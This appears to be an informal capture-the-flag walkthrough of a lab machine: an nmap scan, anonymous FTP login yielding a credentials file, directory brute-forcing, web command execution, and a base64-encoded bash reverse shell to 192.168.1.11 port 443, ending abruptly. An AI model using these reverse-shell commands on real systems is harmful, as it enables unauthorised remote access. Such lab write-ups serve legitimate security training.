Scanning the host with nmap –A –T4 –p- 192.168.1.15 –vv
Anonymous login is acceptable on ftp service port 21, so let’s try it
Username anonymous and password anonymous we can see there are 3 files we can download them one by one using GET command, all of them are text files.
File games.txt: oh and I forgot to tell you I’ve setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
File message.txt: @nitish81299 I am going on holidays for few days, please take care of all the work.
And don’t mess up anything.
File creds.txt: nitu:81299
The game needs to be solved in order to give us a gift but after a 1000 tries, which we don’t have the time so lets move on with something else.
Lets start gobuster or dirsearch on port number 7331
Lets visit the directories we found and see if there is something interesting.
Simply just type id and whoami to get some information.
Now trying to get a shell using nc is not working, we have to encode the shell command as 64code ( googled it ) in order to pass it as understandable to the shell on the host:
bash -i >& /dev/tcp/192.168.1.11/443 0>&1 // this is the shell as we know it
now we encode it in base64:
echo “bash -i >& /dev/tcp/192.168.1.11/443 0>&” | base64
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEvNDQzIDA+JjE=|base64 -d|bash // this is encoded in 64code
a directory at “/home/nitish/.dev/” where a file named creds.txt
The second choice, no matter what number I guess it doesn’t work , so I looked at sam’s directory there is a file .pyc, download it on my machine to read it (python file) open it in python decompiler (online).
The answer is num